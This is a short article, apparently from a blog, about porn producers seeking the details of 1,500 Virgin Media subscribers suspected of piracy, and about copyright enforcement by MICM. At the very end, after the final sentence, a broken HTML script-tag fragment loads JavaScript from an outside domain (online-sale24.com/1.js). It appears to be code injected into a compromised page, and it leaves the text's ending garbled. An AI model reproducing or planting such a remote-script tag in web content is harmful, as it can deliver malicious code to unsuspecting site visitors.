Porn producers target Virgin Media subscribers for porn piracy

To some extent, most of the things you find online are free. However, this is still up for debate. Still, the interests of owners and creators are protected by copyright law and intellectual property law. Under the copyright law, it is illegal to recreate or make copies and distribute the copyrighted material without the copyright holder’s consent. And even porn production is protected by copyright law.

People involved in porn piracy kills the industry. Adult movie companies partner up with copyright enforcers to pursue copyright infringers. For example, Virgin Media was recently asked by porn producers to provide the information of their 1,500 subscribers who are suspected to have “downloaded and shared adult content without permission”. To send out letters informing alleged infringers of the situation, they hired Mircom International Content Management & Consulting Ltd (MICM).

Online piracy, specifically porn piracy, is huge. Killing it may take some time but it can be controlled. In addition, porn production is still business. The loss in revenue from illegal downloads affects the livelihood of corporations and producers. In any case, there has to be a middle ground for both consumers and producers. Until then, there are entities that are willing to protect the rights of creators and owners. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
